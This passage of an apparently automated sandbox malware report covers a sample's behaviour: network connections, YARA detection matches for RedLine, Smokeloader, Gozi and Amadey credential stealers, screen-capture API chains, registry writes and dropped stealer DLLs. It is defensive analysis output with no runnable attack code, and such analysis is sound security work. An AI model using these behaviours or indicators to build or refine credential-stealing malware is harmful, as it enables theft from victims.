SRCHUID=V=2&GUID=DAC8A2EE305D4BBA834A5F5CB6605BDF&dmnchg=1; SRCHD=AF=NOFORM; SUID=M; SRCHUSR=DOB=20221119; SRCHHPGUSR=SRCHLANG=en; MUIDB=1E17B9B70E9B4C6E957D159ED3646FFF
                      Source: unknownHTTPS traffic detected: 23.35.236.109:443 -> 192.168.2.3:49697 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 131.253.33.200:443 -> 192.168.2.3:49699 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 108.167.141.212:443 -> 192.168.2.3:49703 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 148.251.234.93:443 -> 192.168.2.3:49705 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 195.96.151.51:443 -> 192.168.2.3:49714 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 45.154.253.151:443 -> 192.168.2.3:49715 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49722 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 43.231.112.109:443 -> 192.168.2.3:49726 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.3:49729 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.3:49734 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.3:49735 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.3:49740 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 3.5.21.195:443 -> 192.168.2.3:49741 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49743 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 20.190.160.13:443 -> 192.168.2.3:49906 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.208.16.94:443 -> 192.168.2.3:49930 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: Yara matchFile source: 47.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 47.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000002F.00000002.570733528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5128, type: MEMORYSTR
                      Source: Yara matchFile source: 00000018.00000003.726670268.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.726853910.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.726739723.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.726364142.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.726589987.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.726819052.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.819270273.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.726009668.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.726197587.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: E35A.exe PID: 4252, type: MEMORYSTR
                      Source: Yara matchFile source: 24.2.E35A.exe.12094a0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.E35A.exe.bb0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.E35A.exe.12094a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000002.816564354.0000000001209000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.770728847.0000000000131000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000002.773922476.0000000000111000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5816, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 5876, type: MEMORYSTR
                      Source: Yara matchFile source: 11.3.cttgcew.870000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.q4Z52wRd28.exe.970000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.q4Z52wRd28.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.cttgcew.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.q4Z52wRd28.exe.960e67.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.cttgcew.860e67.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000003.256917988.0000000000970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.393943988.00000000025E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.393477736.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.340559376.0000000000A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000003.381680800.0000000000870000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.327872359.0000000003851000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.340651575.0000000000C11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeCode function: 12_2_00402C70 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GdiplusStartup,VirtualProtect,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,
                      Source: EB2B.exe, 0000001C.00000002.453471789.000000000084A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 00000018.00000003.726670268.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.726853910.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.726739723.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.726364142.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.726589987.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.726819052.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.819270273.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.726009668.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000003.726197587.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: E35A.exe PID: 4252, type: MEMORYSTR
                      Source: Yara matchFile source: 24.2.E35A.exe.12094a0.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.E35A.exe.bb0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.E35A.exe.12094a0.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000018.00000002.816564354.0000000001209000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      System Summary

                      barindex
                      Source: 32.3.F771.exe.9c6b90.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 13.3.B4A7.exe.716f68.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 13.3.B4A7.exe.716f68.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 13.3.B4A7.exe.d290000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 32.3.F771.exe.9c6b90.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 32.2.F771.exe.27a0ee8.5.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 13.2.B4A7.exe.716f68.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 32.3.F771.exe.8c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 13.3.B4A7.exe.d290000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 32.2.F771.exe.880e67.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 32.2.F771.exe.27a0ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 13.2.B4A7.exe.716f68.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 13.3.B4A7.exe.d290000.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 32.2.F771.exe.27a0000.4.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 13.3.B4A7.exe.716f68.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 32.2.F771.exe.267a196.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 32.2.F771.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 32.2.F771.exe.267b07e.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 32.2.F771.exe.267b07e.2.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 32.2.F771.exe.27a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 13.3.B4A7.exe.716f68.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 32.2.F771.exe.267a196.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 32.2.F771.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 00000018.00000003.726670268.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                      Source: 00000018.00000003.726670268.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                      Source: 00000018.00000002.792008341.0000000000870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: 0000000C.00000002.424634553.0000000000891000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 0000000B.00000002.393943988.00000000025E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 0000000B.00000002.393477736.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 00000027.00000000.474180010.0000000000900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 00000018.00000003.726853910.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                      Source: 00000018.00000003.726853910.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                      Source: 00000020.00000002.791144627.0000000000880000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: 00000000.00000002.340457364.0000000000960000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: 00000000.00000002.340559376.0000000000A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 0000002B.00000000.482523463.0000000000650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 00000018.00000003.726739723.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                      Source: 00000018.00000003.726739723.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                      Source: 00000018.00000003.726364142.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                      Source: 00000018.00000003.726364142.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                      Source: 00000020.00000003.463369544.00000000008C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 00000018.00000003.726589987.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                      Source: 00000018.00000003.726589987.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                      Source: 0000000C.00000002.428145666.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: 0000000D.00000003.527908931.000000000D290000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 00000018.00000003.726819052.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                      Source: 00000018.00000003.726819052.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                      Source: 00000001.00000000.327872359.0000000003851000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 00000018.00000002.819270273.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                      Source: 00000018.00000002.819270273.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                      Source: 00000023.00000000.462429473.0000000000120000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 0000001A.00000002.597295606.0000000000934000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000000.00000002.340166873.0000000000871000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000020.00000002.850270333.00000000027A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 0000000B.00000002.393611577.00000000008D1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000020.00000002.775109103.0000000000400000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                      Source: 00000018.00000002.797855651.00000000008D1000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000029.00000000.476884087.0000000000A70000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 0000000E.00000002.778202209.0000000000870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: 00000018.00000003.726009668.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                      Source: 00000018.00000003.726009668.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                      Source: 00000000.00000002.340651575.0000000000C11000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 0000000E.00000002.787937568.0000000000A41000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000018.00000003.726197587.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                      Source: 00000018.00000003.726197587.00000000017A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                      Source: 00000026.00000000.469133580.0000000000B80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 00000020.00000002.806650961.0000000000951000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                      Source: 00000021.00000000.456333193.0000000000540000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                      Source: 0000000B.00000002.393447143.0000000000860000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: 0000001A.00000002.593292685.0000000000870000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                      Source: Process Memory Space: E35A.exe PID: 4252, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_fd494041 Author: unknown
                      Source: Process Memory Space: E35A.exe PID: 4252, type: MEMORYSTRMatched rule: Windows_Trojan_Gozi_261f5ac5 Author: unknown
                      Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, type: DROPPEDMatched rule: Detects password stealer DLL. Dropped by Amadey Author: ditekSHen
                      Source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPEDMatched rule: Detects password stealer DLL. Dropped by Amadey Author: ditekSHen
                      Source: C:\Users\user\AppData\Local\Temp\E35A.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Users\user\AppData\Local\Temp\E35A.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Users\user\AppData\Local\Temp\E35A.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Users\user\AppData\Local\Temp\E35A.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Users\user\AppData\Local\Temp\E35A.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Users\user\AppData\Local\Temp\E35A.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Users\user\AppData\Local\Temp\E35A.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Users\user\Desktop\q4Z52wRd28.exeCode function: 0_2_0040E844
                      Source: C:\Users\user\Desktop\q4Z52wRd28.exeCode function: 0_2_0040F8F5
                      Source: C:\Users\user\Desktop\q4Z52wRd28.exeCode function: 0_2_0040B552
                      Source: C:\Users\user\Desktop\q4Z52wRd28.exeCode function: 0_2_0040E300
                      Source: C:\Users\user\AppData\Roaming\cttgcewCode function: 11_2_0040E844
                      Source: C:\Users\user\AppData\Roaming\cttgcewCode function: 11_2_0040F8F5
                      Source: C:\Users\user\AppData\Roaming\cttgcewCode function: 11_2_0040B552
                      Source: C:\Users\user\AppData\Roaming\cttgcewCode function: 11_2_0040E300
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeCode function: 12_2_00429440
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeCode function: 12_2_00428460
                      Source: C:\Users\user\AppData\Local\Temp\A852.exeCode function: 12_2_00407690
                      Source: C:\Windows\explorer.exeSection loaded: webio.dll
                      Source: C:\Windows\explorer.exeSection loaded: capabilityaccessmanagerclient.dll
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll 3B82A0EA49D855327B64073872EBB6B63EEE056E182BE6B1935AA512628252AF
                      Source: q4Z52wRd28.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 32.3.F771.exe.9c6b90.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 13.3.B4A7.exe.716f68.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 13.3.B4A7.exe.716f68.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 13.3.B4A7.exe.d290000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 32.3.F771.exe.9c6b90.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 32.2.F771.exe.27a0ee8.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 13.2.B4A7.exe.716f68.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 32.3.F771.exe.8c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 13.3.B4A7.exe.d290000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 32.2.F771.exe.880e67.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 32.2.F771.exe.27a0ee8.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 13.2.B4A7.exe.716f68.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 13.3.B4A7.exe.d290000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 32.2.F771.exe.27a0000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 13.3.B4A7.exe.716f68.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 32.2.F771.exe.267a196.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 32.2.F771.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 32.2.F771.exe.267b07e.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 32.2.F771.exe.267b07e.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 32.2.F771.exe.27a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                      Source: 13.3.B4A7.exe.716f68.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
